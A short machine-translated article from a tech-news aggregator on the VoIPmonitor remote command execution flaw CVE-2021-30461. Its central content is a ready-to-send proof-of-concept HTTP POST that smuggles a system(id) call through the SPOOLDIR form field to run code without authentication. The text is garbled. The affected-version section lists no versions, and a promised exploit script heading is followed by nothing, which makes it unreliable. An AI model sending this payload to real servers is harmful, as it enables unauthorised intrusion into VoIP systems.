Shulou(Shulou.com)05/31 Report--

This article shows you how to understand the VoIPmonitor remote command execution vulnerability CVE-2021-30461, which is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

I. description of vulnerabilities

The VoIPmonitor Web interface is used to allow unauthenticated remote users to trigger remote PHP code execution vulnerabilities in VoIPmonitor.

Second, influence the version

VoIPmonitor

POC:

POST / index.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Accept-Encoding: gzip, deflateAccept: * / * Connection: closeAccept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 49SPOOLDIR=test%22.system%28id%29.%22&recheck=annen

Write an attempt script:

The above is the VoIPmonitor remote command execution vulnerability CVE-2021-30461 how to understand, have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.